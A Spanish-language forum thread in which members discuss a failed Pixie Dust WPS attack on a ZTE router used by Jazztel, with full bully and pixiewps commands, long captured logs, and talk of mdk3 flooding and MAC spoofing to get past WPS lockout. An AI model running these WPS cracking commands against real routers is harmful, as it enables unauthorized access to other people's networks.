Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado (Pagina 1) / Preguntas generales y busqueda de nuevas brechas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 17-01-2016 19:38:24

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,058

Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

El ZTE H218N es un router empelado por jazztell desde unos cuantos años.
Al inicio tenía el WPS habilitado con PIN por defecto 12345670.
Era una masacre, se obtenían los pass WPA enseguida ya que reaver prueba por defecto 12345670 primero.
Jaztell se dí cuanta de este enorme brecha y deshabilitaron el WPS en mode PIN con una actualización de todos sus routers
Me parece que lo que hicieron es des-configurar el PIN.
El WPS esta habilitado (sale en wash) pero si PIN configurado
Normalmente si se ataca el PA no conseguís nada y mandáis el mismo >PIN en bucle durante horas...
algo así...

 sudo bully wlan2mon -b 2C:95:7F:46:7B:C4 -v 4  -d -1 1
[!] Bully v1.0-25 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY([email protected])
[X] Unknown frequency '681831424' reported by interface 'wlan2mon'
[!] Using '78:44:76:86:d9:e7' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '2c:95:7f:46:7b:c4' on channel 'unknown'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'JAZZTEL_XzSS' (2c:95:7f:46:7b:c4)
[+] Switching interface 'wlan2mon' to channel '1'
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/2c957f467bc4.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Rx(  ID  ) = 'Timeout'   Next pin '08153876'
[+] Switching interface 'wlan2mon' to channel '5'
[+] Switching interface 'wlan2mon' to channel '9'
[+] Switching interface 'wlan2mon' to channel '13'
[+] Switching interface 'wlan2mon' to channel '2'
[+] Switching interface 'wlan2mon' to channel '6'
[+] Switching interface 'wlan2mon' to channel '10'
[+] Switching interface 'wlan2mon' to channel '3'
[+] Switching interface 'wlan2mon' to channel '7'
[+] Switching interface 'wlan2mon' to channel '11'
[+] Switching interface 'wlan2mon' to channel '4'
[+] Switching interface 'wlan2mon' to channel '8'
[+] Switching interface 'wlan2mon' to channel '12'
[+] Switching interface 'wlan2mon' to channel '1'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Rx( Assn ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '08153876'

Y de repente...

[+] Rx( Auth ) = 'Timeout'   Next pin '08153876'
[P] ENonce: 22:6f:99:96:5d:ae:5d:0e:06:46:ef:0d:20:cd:68:19
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: ZTE Corporation
[P] WPS Model Name: ZXHN H298N
[P] WPS Model Number: ZXHN H298N
[P] WPS Serial Number: 123456789012347
[P] RNonce: 55:9c:ff:e3:80:63:f2:5d:87:61:87:96:11:94:7e:e6
[P] PKR: 4a:7d:8a:9e:36:db:b1:69:45:7f:de:32:59:80:14:0e:07:3d:cd:3f:b5:3f:1c:69:a3:14:d1:ae:f0:fa:bf:1d:ed:7a:e3:07:8b:d1:cc:6e:d0:30:7a:80:cc:51:0e:b7:fa:a0:12:63:16:02:6d:7c:0d:91:29:25:fe:13:02:bf:a8:b4:4a:f3:e1:2e:25:a8:f4:1e:47:95:2e:bd:a2:ea:fe:06:5a:d6:27:99:8e:74:a2:cc:40:c5:4a:f5:97:e7:12:fc:7b:f1:ba:e4:a9:48:ed:6a:70:2a:c6:71:ca:00:61:a8:de:73:7f:f3:4b:f7:5b:84:90:b5:b8:f8:50:ab:55:23:90:44:ea:b5:56:b1:c1:41:2e:75:e3:c3:4d:90:d4:09:2d:0c:2d:c1:1a:53:7d:aa:99:8b:cb:33:64:75:19:dc:9b:4d:c1:e6:6a:ac:27:d9:3c:0d:b3:11:92:aa:5c:80:e4:9c:29:12:b6:a9:22:e4:e7:7c:d2:36:24:1e
[P] Authkey: 13:5f:c9:90:aa:11:4d:e8:d3:cf:33:aa:7e:da:3d:17:79:9a:28:9b:be:ba:ac:e6:be:37:c6:11:9b:d8:66:00
[P] E-Hash1: 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f
[P] E-Hash2: 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f
[+] Running pixiewps with the information, wait ...
Cmd : pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 4a:7d:8a:9e:36:db:b1:69:45:7f:de:32:59:80:14:0e:07:3d:cd:3f:b5:3f:1c:69:a3:14:d1:ae:f0:fa:bf:1d:ed:7a:e3:07:8b:d1:cc:6e:d0:30:7a:80:cc:51:0e:b7:fa:a0:12:63:16:02:6d:7c:0d:91:29:25:fe:13:02:bf:a8:b4:4a:f3:e1:2e:25:a8:f4:1e:47:95:2e:bd:a2:ea:fe:06:5a:d6:27:99:8e:74:a2:cc:40:c5:4a:f5:97:e7:12:fc:7b:f1:ba:e4:a9:48:ed:6a:70:2a:c6:71:ca:00:61:a8:de:73:7f:f3:4b:f7:5b:84:90:b5:b8:f8:50:ab:55:23:90:44:ea:b5:56:b1:c1:41:2e:75:e3:c3:4d:90:d4:09:2d:0c:2d:c1:1a:53:7d:aa:99:8b:cb:33:64:75:19:dc:9b:4d:c1:e6:6a:ac:27:d9:3c:0d:b3:11:92:aa:5c:80:e4:9c:29:12:b6:a9:22:e4:e7:7c:d2:36:24:1e -s 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f -z 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f -a 13:5f:c9:90:aa:11:4d:e8:d3:cf:33:aa:7e:da:3d:17:79:9a:28:9b:be:ba:ac:e6:be:37:c6:11:9b:d8:66:00 -n 22:6f:99:96:5d:ae:5d:0e:06:46:ef:0d:20:cd:68:19 -m 55:9c:ff:e3:80:63:f2:5d:87:61:87:96:11:94:7e:e6 -v 1

[Pixie-Dust] WPS pin not found

Sin que sepa porquer consigo recibir un M1, mandar un M2 y recibir M3...
Pixiewps se ejecuta, sin exitó
Esto es raro...
Aún más raro, fijaros en el valor de e-hash 1 y e-hash 2 :

[P] E-Hash1: 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f
[P] E-Hash2: 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f

¡Son iguales! tongue

les recuerdo que no es possible...

pixidust4.jpg

...Al no ser que tengamos ES1 = ES2 y PSK1 = PSK2
  para que psk1 sea igual a psk2 hay un solo PIN que cumple la regla del checksum : 00000000
  por lo de ES1 = ES2 conocemos el caso ralink dónde los dos son iguales y son iguales a 0
  Entonces si PSK1 = PSK2 = ES1 = ES2 = 0 deberíamos haber obtenido el PIN y no fue el caso.

  Desde que lo he conseguido una primera vez parece que sale mas fácilmente con PIN 00000000.... siempre un fail pero otra vez tenemos este extraño resultado con eahsh-1 = eash-2

udo bully wlan2mon -b 2C:95:7F:46:7B:C4 -v 4  -d -1 1 -p 00000000 --force
[!] Bully v1.0-25 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY([email protected])
[X] Unknown frequency '681831424' reported by interface 'wlan2mon'
[!] Starting pin specified, defaulting to sequential mode
[!] Using '78:44:76:86:d9:e7' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '2c:95:7f:46:7b:c4' on channel 'unknown'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'JAZZTEL_XzSS' (2c:95:7f:46:7b:c4)
[+] Switching interface 'wlan2mon' to channel '1'
[!] Restoring session from '/root/.bully/2c957f467bc4.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '00000000'
[P] ENonce: 1e:78:fe:d2:7d:5c:40:93:37:95:b3:07:7c:3a:9e:37
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: ZTE Corporation
[P] WPS Model Name: ZXHN H298N
[P] WPS Model Number: ZXHN H298N
[P] WPS Serial Number: 123456789012347
[P] RNonce: e4:ab:2f:2a:ec:52:fd:7d:e8:62:74:d2:fe:f5:35:61
[P] PKR: d3:39:d8:0b:15:5e:3e:8c:4c:97:60:f0:0e:3c:bc:dc:48:78:dd:7b:03:f7:85:59:80:21:b7:15:47:c8:2c:29:a8:02:66:c5:cd:87:97:c5:01:de:25:63:8c:f5:16:0d:7c:67:d4:b5:09:8d:ab:90:4c:de:e9:3a:30:70:fa:bc:4c:89:11:7e:38:05:1f:64:a5:d6:8d:af:fd:a7:d5:83:f4:c4:e6:d8:0c:2a:2e:82:3b:d0:43:2a:cc:6b:9c:20:b7:e1:71:3e:6e:e4:ca:09:c9:27:da:33:47:cf:6c:42:f5:46:ec:9b:1e:64:7c:05:84:87:89:2f:88:53:a5:8d:04:cb:c8:0e:dc:ea:1c:67:92:6c:4c:30:10:4e:b6:3b:e3:d7:89:40:c4:d9:47:d6:99:e6:98:54:cb:42:b9:7b:3a:d2:82:c9:da:6e:f6:cc:f1:f5:24:45:7c:e0:b7:ef:9c:e4:4a:93:bd:13:b5:76:cd:2d:9b:00:5b:08:07:32
[P] Authkey: 5e:03:6a:7c:4c:4e:fa:17:19:6a:e5:1a:d6:33:cf:76:e2:8c:b5:3b:df:5e:64:2c:a3:39:5e:3b:fc:ed:b2:73
[P] E-Hash1: 2e:e1:6e:3f:6b:d4:b9:a3:36:ff:f0:42:48:9b:9f:bb:e6:2c:19:b2:ad:7b:c9:28:52:5f:a7:61:ce:11:43:10
[P] E-Hash2: 2e:e1:6e:3f:6b:d4:b9:a3:36:ff:f0:42:48:9b:9f:bb:e6:2c:19:b2:ad:7b:c9:28:52:5f:a7:61:ce:11:43:10
[!] Received M2D or out of sequence WPS Message
[+] Running pixiewps with the information, wait ...
Cmd : pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d3:39:d8:0b:15:5e:3e:8c:4c:97:60:f0:0e:3c:bc:dc:48:78:dd:7b:03:f7:85:59:80:21:b7:15:47:c8:2c:29:a8:02:66:c5:cd:87:97:c5:01:de:25:63:8c:f5:16:0d:7c:67:d4:b5:09:8d:ab:90:4c:de:e9:3a:30:70:fa:bc:4c:89:11:7e:38:05:1f:64:a5:d6:8d:af:fd:a7:d5:83:f4:c4:e6:d8:0c:2a:2e:82:3b:d0:43:2a:cc:6b:9c:20:b7:e1:71:3e:6e:e4:ca:09:c9:27:da:33:47:cf:6c:42:f5:46:ec:9b:1e:64:7c:05:84:87:89:2f:88:53:a5:8d:04:cb:c8:0e:dc:ea:1c:67:92:6c:4c:30:10:4e:b6:3b:e3:d7:89:40:c4:d9:47:d6:99:e6:98:54:cb:42:b9:7b:3a:d2:82:c9:da:6e:f6:cc:f1:f5:24:45:7c:e0:b7:ef:9c:e4:4a:93:bd:13:b5:76:cd:2d:9b:00:5b:08:07:32 -s 2e:e1:6e:3f:6b:d4:b9:a3:36:ff:f0:42:48:9b:9f:bb:e6:2c:19:b2:ad:7b:c9:28:52:5f:a7:61:ce:11:43:10 -z 2e:e1:6e:3f:6b:d4:b9:a3:36:ff:f0:42:48:9b:9f:bb:e6:2c:19:b2:ad:7b:c9:28:52:5f:a7:61:ce:11:43:10 -a 5e:03:6a:7c:4c:4e:fa:17:19:6a:e5:1a:d6:33:cf:76:e2:8c:b5:3b:df:5e:64:2c:a3:39:5e:3b:fc:ed:b2:73 -n 1e:78:fe:d2:7d:5c:40:93:37:95:b3:07:7c:3a:9e:37 -m e4:ab:2f:2a:ec:52:fd:7d:e8:62:74:d2:fe:f5:35:61 -v 1

[Pixie-Dust] WPS pin not found

[Pixie-Dust] PIN FOUND: 
[+] Rx(  M5  ) = 'WPSFail'   Next pin '00000000'
[+] Rx( Auth ) = 'Timeout'   Next pin '00000000'
[!] Received disassociation/deauthentication from the AP

Es dificil sacar conlcusiones en estas condicones con un router pacheado y sin posibildad de configurar el WPS.
El routeur esta en un estado extraño pero el hecho de que sus "nounces" que deberían ser unicas son iguales podría indicar una falta de entropia y simplificar drasticamente  - si es el caso - un eventual brute force ya que se haría con pares de es-1 y es-2 similares sobre las 11000 possibilidades que representan los PSK1 (primera mitad) y PSK2 (segunda mitad)
Además ha genrado la misma PKE... la e-nouce es diferente pero la PKE es la misma.

¡Recuerdo que es por PKE repetidas que hemos puesto el dedo en la brecha realtek!

ZTEH218N_1.jpg

¡Y es exactamente la misma PKE para este router con chipset broadcom!

El soporte broadcom en pixiewps esta muy limitado.... no he conseguido nada sobre ninguno dispositivo comtrend (suelen levar broadcom) o lo que sea que abundan aquí en España.
¿Tenemos aqui algo de materia para lograr algo contra otros chipsets boradcom que los soportafos?
¿O es simplemente un comportamiento errático y anormal del WPS con el PIN des-configurado y no nos sirve?
Es también de interés esta extraña capacidad a inyectar paquetes M de repente...
¿Se podría llegar a algun tipo de estado extraño vulnerable con una inyección masiva de m2?... Además sobre un dispositivo que no debería mandar unos M1 (menos aún M3)
Es algo que había probado el compañero soxrok2212 y había obtenido algo de resultados... ( ver Force an AP to reboot @ kali forum)
  A ver....

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 17-01-2016 22:04:10

d1k0w0ns
VeryInsaneUsuario

Registrado: 12-06-2015
Mensajes: 197

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

el nuevo codigo de murderdeadkill3 que anuncian en el post de kali no existe esta desaparecido del git, tu lo tienes?
lo han quitado por algo que no lei??
no iria muy bien supongo no lei todo el post voy con las prisas xD
me baje otro del mismo hilo que se llama VMR-MDK a ver si lo pruebo.

Desconectado

#3 18-01-2016 01:52:56

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,058

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

no iria muy bien supongo no lei todo el post voy con las prisas xD

supones bien big_smile

el nuevo codigo de murderdeadkill3

No se a que código te refieres / no lo tengo

me baje otro del mismo hilo que se llama VMR-MDK a ver si lo pruebo.

El script favorito de Saturno big_smile...
...Esto  no lleva nada nuevo.
Es un script que usa mdk3 y el cambio de mac para intentar burlar el bloqueo del WPS... digo bien "intentar" porque los resultados se hacen aún esperar tongue
Ya sabes lo que hay con el cambio de mac (no sirve) y ya sabes lo que hay con lo de hacer crashear un router con inyección de paquetes con mdk3 (funcionara con routers de 2002 con 4MB de RAM)

Desconectado

#4 18-01-2016 13:55:59

d1k0w0ns
VeryInsaneUsuario

Registrado: 12-06-2015
Mensajes: 197

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

me referia a este codigo que sale en el primer mensaje que ahora me fije en todo y es del 2013

-Thanks to a Musket Developer, the community now has a modified version of MDK3! This version features a new test mode "t" where it sends a user specified amount of invalid probe requests to an AP.
-You can download mdk3-master here   https://github.com/soxrok2212/mdk3-master

si fuera bien supongo que seguiria estando y no lo hubieran borrado porque el resto del git funciona.


si el forked VMR-MDK se basa en el cambio de mac tema cerrado sobre ese codigo, no sirve para nada

para que pones posts del 2013 sin avisar no ves que confundes smile

Desconectado

#5 18-01-2016 22:43:03

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,058

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

2013 es la fecha de inscripción de soxrok2212 big_smile
El tema fue abierto el 2015-05-11, 11:10 PM

No se porque soxrok2212 lo ha retirado, muy probablemente porque no cumplía o no servía.
Si te interesa le puedo preguntar porque y obtener el código si es posible
Lo que hacía esta nueva opcion "-t" es lo mismo que  un "SSID brute force" pero mandando solo SSID con caracteres "inválidos".
Cosa que al final se puede hacer de todo modo directamente con mdk3v6 y sus opciones "nativas" si especificas un diccionario o un charset con símbolos "inválidos" para hacer una inyección de eSSID.

Desconectado

#6 19-01-2016 17:47:54

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,058

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

Conclusión sobre este caso extraño de ataque pixiedust "falso"

  Después haber expuesto el caso en el foro Kali y de haber hablado del caso con wiire (pixiewps) y soxrok2212 (reaver 1.5.2 ) hemos podido entender lo que pasaba
Teníamos dos cosas alucinantes :

  1. PKE repetida que es igual a la PKE utilizada por los routers con chipset Realteck

  2. Ehash-1 es igual a Ehash-2

Primer punto :
Hay un error en la wikidevi o existen varias versiones de este modelo, el caso es que el router lleva un chipset realtek.
Se puede ver en uno de los tag "Vendor specific"

ZTE_20.jpg

Normal entonces encontrar la PKE especifica a los chipset realtek big_smile

Segundo punto :
wiire comentó que ha obtenido las mismas cadenas para ehash1 y ehash2 contra chipset ralink cuando el router esta solo en modo PBC.(No wps pìn)
Como nuestro ZTE no tiene el WPS habilitado es "normal" que recibamos estos ehash repetidos.
No nos sirven para nada...
